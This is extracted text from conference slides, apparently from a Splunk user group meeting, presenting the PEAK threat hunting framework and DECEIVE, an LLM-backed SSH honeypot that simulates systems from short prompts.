  • 33. © 2025 SPLUNK LLC The PEAK Threat Hunting Framework PEAK builds on existing frameworks (Sqrrl, TaHiTi) and helps you quickly establish repeatable, efficient hunting operations: ● Hypothesis-driven, Baseline, and Machine Learning/AI hunt procedures ● Standards for hunt documentation ● Guidelines for creating automated detection ● Metrics that highlight the impact of hunting For more on PEAK, download the official framework documentation at splk.it/PEAK-Framework
  • 34. © 2025 SPLUNK LLC Bluenomicon: The Network Defender’s Compendium Personal essays from cybersecurity luminaries Download your copy at splk.it/bluenomicon
  • 35. © 2025 SPLUNK LLC Part 2: Deceive Project
  • 36. Hi Fidelity != Hi Effort Meet DECEIVE, the AI-backed SSH Honeypot David J. Bianco Staff Security Strategist @[email protected] @DavidJBianco.bsky.social June 2025
  • 37. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential About Me • 20+ years of experience in incident detection & response, threat hunting, CTI, and other Blue-team topics • SANS Certified Instructor • Creator of the Pyramid of Pain & Lead author of the PEAK Threat Hunting Framework • Terrible at introducing himself
  • 38. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Why I started writing DECEIVE
  • 39. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential The problem I wanted to solve Deception is a balancing act between realism and effort The more realistic it is, the more time you must put into it to set it up Plus, real systems are vulnerable to exploitation and misuse, which can be a barrier to adoption (just ask your lawyers)
  • 40. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How does DECEIVE address the problems? DECEIVE leverages a modular AI backend to provide all the “realism” with users, processes, and data. Given a short, simple prompt, it can simulate a variety of different SSH-accessible systems It looks real, but there’s no actual system for threat actors to take advantage of You are a video game developer's system. Include realistic video game source and asset files. You are a Cisco router running IOS XE 17.17. You are a SunOS 4.1 workstation.
  • 41. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential DECEIVE Demo!
  • 42. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sample log: User input pwd /home/guest guest@prod-dev01:~ $
  • 43. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sample log: Session Evaluation
  • 44. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential DECEIVE Development Me: a Python programmer with just a bit of prior LLM coding experience. From idea to first working demo: three days. • Half of that was getting the SSH code to work right. With additional enhancements courtesy of GitHub Copilot.
  • 45. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Weaknesses and Drawbacks Every session is a new system. No terminal interaction. Certain commands (e.g., vi) don’t work. You cannot move data in or out of the honeypot. Payloads can’t be downloaded. Timing depends on the LLM response time, which can be slow.
  • 46. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Future Plans Can I make it more realistic? Can I improve emulation of non-Linuxy things? Automated honeynet deployment? What about other protocols?
  • 47. © 2025 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How to get started with DECEIVE Source code is available on GitHub https://github.com/splunk/DECEIVE
  • 48. Hi Fidelity != Hi Effort Meet DECEIVE, the AI-backed SSH Honeypot David J. Bianco Staff Security Strategist @[email protected] @DavidJBianco.bsky.social June 2025
  • 49. © 2025 SPLUNK LLC Part 3: PEAK Framework
  • 50. © 2025 SPLUNK LLC The PEAK Threat Hunting Framework
  • 51. © 2025 SPLUNK LLC © 2025 SPLUNK LLC The Sqrrl Threat Hunting Loop (2015) Everyone wanted to hunt, but few agreed on what hunting was or how to do it Sqrrl’s threat hunting loop was the first published “how to” for threat hunting Focused on hypothesis-driven hunting and detection improvement Credit: Sqrrl
  • 52. © 2025 SPLUNK LLC Prepare, Execute, and Act with Knowledge Hypothesis-driven Baseline (anomaly) Model-Assisted Threat Hunting (MATH) With detailed processes Hunt documentation Gaps & risks Stakeholder comms Detections Not only incidents Hierarchy of detection outputs provides additional options Helps teams target specific detections for improvement Beyond just rules Communicate the impact of hunting Show value across your entire security program Better storytelling PEAK incorporates lessons and experience from the last ten years More hunt types Defined deliverables Detection Guidance Effective metrics
  • 53. © 2025 SPLUNK LLC © 2025 SPLUNK LLC Complete process diagrams for new hunt types Hypothesis-Based Baseline Model-Assisted
  • 54. © 2025 SPLUNK LLC © 2025 SPLUNK LLC Defined Hunt Deliverables
  • 55. © 2025 SPLUNK LLC © 2025 SPLUNK LLC Detection Engineering Guidance Dashboards & Visualizations Present the distilled info to humans and let them decide. Some automation, but still requires manual review on a regular basis. Reports Saved searches with little or no pre-processing. Human must spend significant effort to extract meaning. Analytics in Code Splunk® MLTK, Python, or other algorithmic detections. Automated, but more complex. May take significant resources. More management and upkeep necessary. 4 Signatures & Rules Splunk® Enterprise Security, Suricata IDS, etc. Automated. Simple and easy to manage. 1 3 2
  • 56. © 2025 SPLUNK LLC © 2025 SPLUNK LLC Metrics to tell the story of hunting impact 5 T e c h n i q u e s H u n t e d M a p h u n t e d b e h a v i o r s t o A T T & C K , K i l l C h a i n , P y r a m i d o f P a i n , e t c . W h e r e a r e y o u h u n t i n g ? W h e r e s h o u l d y o u h u n t n e x t ? 4 V u l n e r a b i l i t i e s & M i s c o n fi g u r a t i o n s U p d a t e s a n d c o r r e c t i o n s t o s y s t e m s a n d s e r v i c e s a s a r e s u l t o f h u n t fi n d i n g s 3 G a p s I d e n t i fi e d / G a p s C l o s e d V i s i b i l i t y , t o o l s , a c c e s s , e t c . t h a t y o u d i d n ’ t h a v e a n d o n e s t h a t y o u l a t e r a c q u i r e d D e t e c t i o n s C r e a t e d / U p d a t e d N u m b e r o f n e w o r i m p r o v e d d e t e c t i o n s , b y t y p e , a s a r e s u l t o f h u n t i n g 2 1 I n c i d e n t s O p e n e d N u m b e r o f i n c i d e n t s c r e a t e d d u r i n g h u n t s , b u t a l s o o p e n e d l a t e r a s a r e s u l t o f d e t e c t i o n s c r e a t e d f r o m h u n t i n g
  • 57. © 2025 SPLUNK LLC © 2025 SPLUNK LLC Reach the PEAK! Download the PEAK eBook Join the Community Slack #peak-threat-hunting
  • 58. © 2025 SPLUNK LLC Ransomware Analysis Analyzing encryption speeds to reconsider ransomware response. PEAK Threat Hunter's Cookbook A structured approach to closing the gap between theory and practice in Threat Hunting. Teaching analysts to cook – with Splunk! COMING AUGUST 2025
  • 59. © 2025 SPLUNK LLC The PEAK Threat Hunting Workshop ● Understand the PEAK Framework ● Master Three Types of Threat Hunts ● Hands-on Experience
  • 60. © 2025 SPLUNK LLC Where you can find us How to stay informed ● Stay up to date on all things SURGe with our Newsletter splunk.com/surge
  • 61. © 2025 SPLUNK LLC Thank you
  • 62. © 2023 SPLUNK INC. Wrap-Up ● Did you like it? ● Please fill in the post-event survey! ● Slides will be shared on SUG #7 event page and Slideshare! ● Talk to us :-) Slack Register and subscribe to #ug_prague channel Email [email protected] [email protected] [email protected] [email protected] LinkedIn https://www.linkedin.com/groups/9544692/
  • 63. © 2023 SPLUNK INC. See you next time